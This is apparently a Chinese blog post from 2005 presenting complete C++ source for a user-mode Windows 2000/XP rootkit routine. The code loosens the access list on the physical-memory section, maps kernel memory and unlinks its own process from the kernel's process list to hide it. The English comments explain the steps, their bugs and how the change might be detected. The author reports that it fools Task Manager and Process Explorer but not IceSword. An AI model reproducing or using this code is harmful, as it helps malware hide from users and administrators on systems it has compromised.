
[rootkit]进程隐藏自己不被发现 原创空间, 软件技术, 电脑与网络
邢红瑞 发表于 2005/10/20 18:41:25 |
做到这个其实不大容易,最早看过fu_root的代码,还得需要一个驱动,做病毒的可不会给自己做一个驱动的,还好网上有现成的源代码。HideProcess.h只是一个头文件,为了引用方便,BOOL HideProcess();// hideprocess.cpp : Defines the entry point for the console application.//
#include "stdafx.h"///////////////////////////////////////////////////////////////////////////////HideProcess.cpp#include<windows.h>#include<Accctrl.h>#include<Aclapi.h>
#include"HideProcess.h"
// Status-code helpers. NTSTATUS values are non-negative on success, so
// NT_SUCCESS is a plain sign test on the value.
#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
// Local declarations of the native-API structures used below; they are
// written out here rather than taken from an SDK header.
// IO_STATUS_BLOCK is declared but not referenced anywhere in this listing.
typedef struct _IO_STATUS_BLOCK {
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
// OBJECT_ATTRIBUTES.Attributes flag values. OpenPhysicalMemory passes 0,
// so none of these is actually used in this file.
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
// Function-pointer types for the two ntdll exports that InitNTDLL resolves
// with GetProcAddress at run time.
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes );
typedef VOID (CALLBACK* RTLINITUNICODESTRING)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString );
// Run-time-resolved ntdll exports and the process-wide state shared by the
// routines below.
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;            // ntdll.dll handle (InitNTDLL / CloseNTDLL)
PVOID g_pMapPhysicalMemory = NULL;  // view of the page mapped at PhyDirectory (OpenPhysicalMemory)
HANDLE g_hMPM = NULL;               // section handle for \Device\PhysicalMemory
OSVERSIONINFO g_osvi;               // filled in OpenPhysicalMemory, read again in YHideProcess
//---------------------------------------------------------------------------
// Loads ntdll.dll and resolves RtlInitUnicodeString and ZwOpenSection.
// Returns FALSE only when LoadLibrary fails; the two GetProcAddress results
// are stored without a NULL check, so a missing export would only surface
// when the pointer is called.
BOOL InitNTDLL()
{
    g_hNtDLL = LoadLibrary("ntdll.dll");
    if (NULL == g_hNtDLL) return FALSE;
    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,
        "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
    return TRUE;
}
//---------------------------------------------------------------------------
// Releases the ntdll.dll handle taken by InitNTDLL and clears the global.
// Safe to call when InitNTDLL was never called or failed.
VOID CloseNTDLL()
{
    if(NULL != g_hNtDLL) FreeLibrary(g_hNtDLL);
    g_hNtDLL = NULL;
}
//---------------------------------------------------------------------------
// Adds an ACE granting SECTION_MAP_WRITE to "CURRENT_USER" on the DACL of
// hSection (the \Device\PhysicalMemory section, opened with WRITE_DAC by
// OpenPhysicalMemory). This DACL rewrite is what lets a user-mode process
// obtain a writable mapping of physical memory; it is also the step that
// leaves an observable change on the object's security descriptor, which
// is a natural thing for an integrity check to look at.
// Note: each failure branch frees the temporaries but does not return, so
// the following calls still run with whatever pDacl/pNewDacl hold, and the
// caller receives no success/failure indication. On the success path pSD
// and pNewDacl are not freed.
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    PACL pNewDacl = NULL;
    DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,
        NULL, &pDacl, NULL, &pSD);
    if(ERROR_SUCCESS != dwRes) {
        if(pSD) LocalFree(pSD);
        if(pNewDacl) LocalFree(pNewDacl);
    }
    EXPLICIT_ACCESS ea;
    RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance= NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = "CURRENT_USER";
    // Merge the new ACE with the existing DACL, then write the result back.
    dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
    if(ERROR_SUCCESS != dwRes) {
        if(pSD) LocalFree(pSD);
        if(pNewDacl) LocalFree(pNewDacl);
    }
    dwRes = SetSecurityInfo
        (hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);
    if(ERROR_SUCCESS != dwRes) {
        if(pSD) LocalFree(pSD);
        if(pNewDacl) LocalFree(pNewDacl);
    }
}
//---------------------------------------------------------------------------
// Opens \Device\PhysicalMemory and maps the single 4 KB page that the rest
// of the file treats as the kernel page directory (see LinearToPhys).
// Only major version 5 is accepted, with a hard-coded directory address per
// minor version (0x30000 labelled "2k", 0x39000 labelled "xp" in the
// original comments); any other version returns NULL. If the first open is
// refused, the section is reopened with READ_CONTROL|WRITE_DAC, its DACL is
// widened by SetPhyscialMemorySectionCanBeWrited, the handle is closed and
// the open is retried. Returns g_hMPM on success, NULL otherwise.
// The view stored in g_pMapPhysicalMemory is never unmapped by this file.
// NOTE(review): later Windows releases no longer allow user-mode opens of
// this section, so on those the path fails at the first ZwOpenSection.
HANDLE OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory;
    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx (&g_osvi);
    if (5 != g_osvi.dwMajorVersion) return NULL;
    switch(g_osvi.dwMinorVersion) {
        case 0: PhyDirectory = 0x30000; break; //2k
        case 1: PhyDirectory = 0x39000; break; //xp
        default: return NULL;
    }
    RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
    attributes.Length = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory = NULL;
    attributes.ObjectName = &physmemString;
    attributes.Attributes = 0;
    attributes.SecurityDescriptor = NULL;
    attributes.SecurityQualityOfService = NULL;
    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
    if(status == STATUS_ACCESS_DENIED) {
        // Access denied: take WRITE_DAC instead, loosen the DACL, and retry.
        status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
        SetPhyscialMemorySectionCanBeWrited(g_hMPM);
        CloseHandle(g_hMPM);
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
    }
    if(!NT_SUCCESS(status)) return NULL;
    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,
        0x1000);
    if( g_pMapPhysicalMemory == NULL ) return NULL;
    return g_hMPM;
}
//---------------------------------------------------------------------------
// Translates a virtual address into a physical one by walking the two-level
// 32-bit (non-PAE) page tables by hand: bits 31..22 index the directory
// (BaseAddress), bits 21..12 the page table, bits 11..0 are the byte offset.
// Returns 0 when the directory or table entry is not present (bit 0 clear).
// Bit 7 of the directory entry marks a 4 MB page, in which case the page
// table level is skipped. The MapViewOfFile result for the page table is
// indexed without a NULL check, and if the PTE is not present the function
// returns before UnmapViewOfFile, leaking that view.
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
    PGDE = BaseAddress[VAddr>>22];
    if (0 == (PGDE&1)) return 0;
    ULONG tmp = PGDE & 0x00000080;
    if (0 != tmp) {
        // 4 MB page: the top 10 bits of the entry are the physical base.
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
    } else {
        // Map the page table the directory entry points at and read the PTE.
        // The literal 4 is the value of FILE_MAP_READ.
        PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
        PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
        if (0 == (PTE&1)) return 0;
        PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
        UnmapViewOfFile((PVOID)PGDE);
    }
    return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
// Reads one 32-bit value at kernel virtual address addr: translates it with
// LinearToPhys, maps the containing 4 KB physical page, reads the dword at
// the page offset, unmaps. Returns 0 both when the mapping fails and when
// the stored value itself is 0, so callers cannot tell the two apart.
ULONG GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &0xfffff000, 0x1000);
    if (0 == tmp) return 0;
    ULONG ret = tmp[(phys & 0xFFF)>>2];
    UnmapViewOfFile(tmp);
    return ret;
}
//---------------------------------------------------------------------------
// Writes one 32-bit value to kernel virtual address addr through a fresh
// mapping of the containing physical page. Returns FALSE only when
// MapViewOfFile fails; a 0 result from LinearToPhys is not rejected and
// would map physical page 0 instead.
BOOL SetData(PVOID addr,ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
    if (0 == tmp) return FALSE;
    tmp[(phys & 0xFFF)>>2] = data;
    UnmapViewOfFile(tmp);
    return TRUE;
}
//---------------------------------------------------------------------------
// Unhandled-exception filter that terminates the process instead of letting
// a crash surface. Its registration in YHideProcess is commented out, so it
// is unused as written; the return statement is unreachable after
// ExitProcess.
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
    ExitProcess(0);
    return 1 ;
}
//---------------------------------------------------------------------------
// Performs the hide. Reads a thread pointer from the fixed address
// 0xFFDFF124 (labelled "kteb" in the original), follows it at +0x44 to the
// owning process structure ("kpeb"), reads the two list pointers at a
// version-specific offset (0xa0/0xa4 for minor 0, 0x88/0x8c for minor 1),
// and re-links the neighbours around this entry (fw+4 := bw, bw+0 := fw),
// i.e. removes the process from a kernel doubly linked list -- presumably
// the active-process list -- while it keeps running.
// The blog text reports that Task Manager and Process Explorer no longer
// show the process afterwards but IceSword still does, so enumeration that
// does not rely on this list is the detection route.
// fw/bw are only assigned for minor versions 0 and 1; any other version is
// already rejected by OpenPhysicalMemory, so they are not read uninitialised
// in practice. The physical-memory view is never unmapped; the section
// handle and ntdll are released unconditionally before returning TRUE.
BOOL YHideProcess()
{
//	SetUnhandledExceptionFilter(exeception);
    if (FALSE == InitNTDLL()) return FALSE;
    if (0 == OpenPhysicalMemory()) return FALSE;
    ULONG thread = GetData((PVOID)0xFFDFF124); //kteb
    ULONG process = GetData(PVOID(thread + 0x44)); //kpeb
    ULONG fw, bw;
    if (0 == g_osvi.dwMinorVersion) {
        fw = GetData(PVOID(process + 0xa0));
        bw = GetData(PVOID(process + 0xa4));
    }
    if (1 == g_osvi.dwMinorVersion) {
        fw = GetData(PVOID(process + 0x88));
        bw = GetData(PVOID(process + 0x8c));
    }
    // Unlink: the forward neighbour's back pointer and the backward
    // neighbour's forward pointer now skip this entry.
    SetData(PVOID(fw + 4), bw);
    SetData(PVOID(bw), fw);
    CloseHandle(g_hMPM);
    CloseNTDLL();
    return TRUE;
}
// Public entry point declared in HideProcess.h. A function-static flag makes
// YHideProcess run at most once per process; its result is discarded and
// TRUE is returned on every call, so callers cannot tell whether the hide
// actually succeeded.
BOOL HideProcess()
{
    static BOOL b_hide = false;
    if (!b_hide) {
        b_hide = true;
        YHideProcess();
        return true;
    }
    return true;
}
测试任务管理器和procxp都可以用骗过去,发现骗不过去icesword,还是红色背景。 |